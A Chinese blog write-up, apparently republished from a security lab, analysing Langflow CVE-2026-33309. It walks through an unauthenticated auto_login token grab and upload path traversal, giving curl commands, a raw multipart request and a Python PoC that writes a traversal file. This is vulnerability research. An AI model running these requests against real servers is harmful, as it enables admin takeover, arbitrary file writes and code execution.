文章总结： 本文对Langflow高危漏洞CVE-2026-33309进行了深度分析。该漏洞由系统默认开启的AUTO_LOGIN功能和文件上传接口的路径穿越问题组合而成。攻击者可利用该漏洞一键获取管理员Token，进而通过路径穿越实现任意文件写入，并最终覆盖或注入恶意Python组件以达成远程代码执行（RCE）。文章详细阐述了漏洞成因、利用步骤及影响，并强调其攻击链完整，利用门槛低，危害极其严重。 综合评分： 85 文章分类： 漏洞分析,WEB安全,红队,渗透测试,安全运营

Langflow高危漏洞CVE-2026-33309深度分析：一键拿Token到远程代码执行

原创

zz zz

星络安全实验室

2026年3月21日 08:01 重庆

| | | — | | 免责声明:文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责作者不为此承担任何责任，一旦造成后果请自行负责 |

🔹0x01 漏洞成因分析

漏洞的核心由两个问题组合导致：

1️⃣ 未授权获取管理员 Token

当系统开启默认配置：

AUTO_LOGIN=true

攻击者可以直接调用接口获取管理员权限 Token：

curl https://ip/api/v1/auto_login

👉 返回结果中包含：

{  "access_token": "xxxx"}

📌安全问题：

• 无需认证
• 直接获取管理员权限
• 完全接管 API

2️⃣ 文件上传接口存在路径穿越

接口：

POST /api/v2/files/

存在以下问题：

• 未过滤 filename
• 未限制路径
• 允许 ../ 路径穿越

🔹0x02 漏洞利用过程

Step 1：获取管理员 Token

curl https://ip/api/v1/auto_login

Step 2：构造路径穿越上传

数据包如下

POST /api/v2/files/ HTTP/1.1
Host: xx
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Authorization: Bearer Token
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 291

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="../../log.txt"
Content-Type: text/plain

111
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Python PoC：

import requests

BASE_URL = "http://localhost:7860"

token = requests.get(f"{BASE_URL}/api/v1/auto_login").json()["access_token"]

files = {
    "file": ("../../traversal_proof.txt", b"CVE_RESEARCH_SENTINEL_KEY", "text/plain")
}

resp = requests.post(
    f"{BASE_URL}/api/v2/files/",
    headers={"Authorization": f"Bearer {token}"},
    files=files,
)

print(resp.status_code)

Step 3：验证文件写入

成功返回：

HTTP/1.1 201 Created

📌 说明：

• ../ 生效
• 路径可控
• 成功突破上传目录限制

👉确认存在任意文件写入漏洞

🔹0x04 漏洞影响

该漏洞影响极其严重：

✅ 1. 任意文件写入

攻击者可以写入任意路径（取决于权限）

✅ 2. 覆盖系统文件

例如：

• 配置文件
• Python 模块
• 缓存文件

✅ 3. 远程代码执行（RCE）

结合系统特性：

• 动态加载组件
• Python 执行环境

攻击者可以：

• 写入恶意 .py
• 覆盖模块
• 或注入自定义组件

最终实现：

id
whoami

🔹0x05 利用链总结

完整攻击路径如下：

AUTO_LOGIN 未授权
        ↓
获取管理员 Token
        ↓
调用文件上传接口
        ↓
路径穿越（../）
        ↓
任意文件写入
        ↓
覆盖 / 注入 Python 组件
        ↓
RCE（远程代码执行）

🔹0x06 总结

CVE-2026-33309 并不是单点漏洞，而是：

❗“未授权 + 路径穿越 + 动态执行”组合漏洞

其危害在于：

• 利用门槛极低（默认配置）
• 攻击链完整
• 可直接导致服务器沦陷

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：星络安全实验室 zz zz《Langflow高危漏洞CVE-2026-33309深度分析：一键拿Token到远程代码执行》